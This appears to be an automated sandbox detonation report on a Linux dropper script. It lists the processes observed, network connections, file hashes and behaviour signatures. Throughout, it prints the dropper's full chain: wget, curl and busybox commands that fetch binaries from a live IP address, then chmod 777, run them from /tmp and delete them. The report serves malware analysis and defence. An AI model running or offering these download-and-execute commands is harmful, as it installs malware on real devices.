[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV

[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/rm

[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/wget

[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/chmod

[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3

[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/rm

[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/wget

[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/chmod

[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl

[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/rm

[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/wget

[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/chmod

[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV

[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/rm

[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/usr/bin/wget

[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/chmod

[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC

[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/rm

[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/usr/bin/wget

[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/chmod

[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe

[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/rm

[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/usr/bin/wget

[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/chmod

[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB

[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/rm

[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/usr/bin/wget

[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/chmod

[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr

[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/rm

[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/usr/bin/wget

[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/chmod

[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm

[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/rm

[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/usr/bin/wget

[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/chmod

[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr

[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/rm

[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/usr/bin/wget

[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/chmod

[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC

[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/rm

[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-25 01:17

Reported

2024-10-25 01:20

Platform

debian9-mipsel-20240611-en

Max time kernel

80s

Max time network

82s

Command Line

[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC N/A
N/A /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe N/A
N/A /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB N/A
N/A /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 N/A
N/A /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl N/A
N/A /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV N/A
N/A /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr N/A
N/A /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr N/A
N/A /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC N/A
N/A /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm N/A
N/A /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff N/A
N/A /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp N/A
N/A /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV N/A
N/A /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad N/A
N/A /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad N/A
N/A /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff N/A
N/A /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp N/A
N/A /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV N/A
N/A /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 N/A
N/A /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl N/A
N/A /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV N/A
N/A /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC N/A
N/A /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe N/A
N/A /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB N/A
N/A /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr N/A
N/A /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm N/A
N/A /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr N/A
N/A /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /usr/bin/curl N/A
File opened for modification /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /usr/bin/curl N/A
File opened for modification /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /usr/bin/curl N/A
File opened for modification /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /usr/bin/curl N/A
File opened for modification /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /usr/bin/curl N/A
File opened for modification /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /usr/bin/curl N/A
File opened for modification /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /usr/bin/curl N/A
File opened for modification /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /usr/bin/curl N/A
File opened for modification /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /usr/bin/curl N/A
File opened for modification /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /usr/bin/curl N/A
File opened for modification /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /usr/bin/curl N/A
File opened for modification /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /usr/bin/curl N/A
File opened for modification /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /usr/bin/curl N/A
File opened for modification /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /usr/bin/curl N/A
File opened for modification /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /usr/bin/curl N/A
File opened for modification /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /usr/bin/curl N/A
File opened for modification /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /usr/bin/curl N/A
File opened for modification /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /usr/bin/curl N/A
File opened for modification /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /usr/bin/curl N/A
File opened for modification /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /usr/bin/curl N/A
File opened for modification /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /usr/bin/curl N/A
File opened for modification /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /usr/bin/curl N/A
File opened for modification /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /usr/bin/curl N/A
File opened for modification /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /usr/bin/curl N/A
File opened for modification /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /usr/bin/curl N/A
File opened for modification /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /usr/bin/curl N/A
File opened for modification /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /usr/bin/curl N/A
File opened for modification /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /usr/bin/curl N/A

Processes

/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh

[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/chmod

[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC

[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/rm

[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/usr/bin/wget

[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/chmod

[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe

[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/rm

[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/usr/bin/wget

[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/chmod

[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB

[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/rm

[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/usr/bin/wget

[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/chmod

[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3

[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/rm

[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/wget

[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/chmod

[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl

[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/rm

[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/wget

[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/chmod

[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV

[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/rm

[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/usr/bin/wget

[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/chmod

[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr

[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/rm

[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/usr/bin/wget

[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/chmod

[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr

[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/rm

[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/usr/bin/wget

[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/busybox

